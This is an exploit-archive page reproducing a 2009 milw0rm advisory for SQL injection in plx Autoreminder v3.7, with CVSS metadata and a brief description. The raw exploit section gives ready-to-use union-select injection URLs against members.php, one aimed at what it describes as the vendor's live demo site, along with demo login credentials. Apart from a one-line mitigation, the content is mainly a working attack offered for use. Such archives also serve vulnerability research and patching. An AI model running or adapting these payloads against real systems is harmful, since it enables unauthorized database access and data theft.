header-logo
Suggest Exploit
vendor:
Autoreminder
by:
ZoRLu
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Autoreminder
Affected Version From: 3.7
Affected Version To: 3.7
Patch Exists: NO
Related CWE: N/A
CPE: a:plx_web_dev:autoreminder
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

plx Autoreminder v3.7 (id) R-Sql Injection

An SQL injection vulnerability in plx Autoreminder v3.7 allows an attacker to execute arbitrary SQL commands via the 'id' parameter in the 'members.php' script. An attacker can use the 'concat()' function to extract the username, version, and database of the application. The attacker can also use the 'union select' statement to extract data from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

[~] plx Autoreminder v3.7 (id) R-Sql Ýnj
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu  msn: trt-turk@hotmail.com
[~]
[~] Date: 04.01.09
[~]
[~] Home: z0rlu.blogspot.com / www.experl.com 
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] EN ONEMLi N0T: demolarI hackleyen top olsun top ( if you hack demo you will be ball xD )
[~] -----------------------------------------------------------

you must login to site

R-Sql

z0rlu.blogspot.com/members.php?s=newar&edmode=1&id=999999999+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16

for demo:

user: trt-turk@hotmail.com

pass: salla1

http://www.plxwebdev.com/demos/autoreminder/members.php?s=newar&edmode=1&id=999999999+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & Scriptorium & h4ckinger & Cyber_Thief & BLaSTeR & Ahmet and all experl.com users :)
[~]
[~] yildirimordulari.org  &  experl.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-01-04]

Navigation

Suggest Exploit

Services By CQR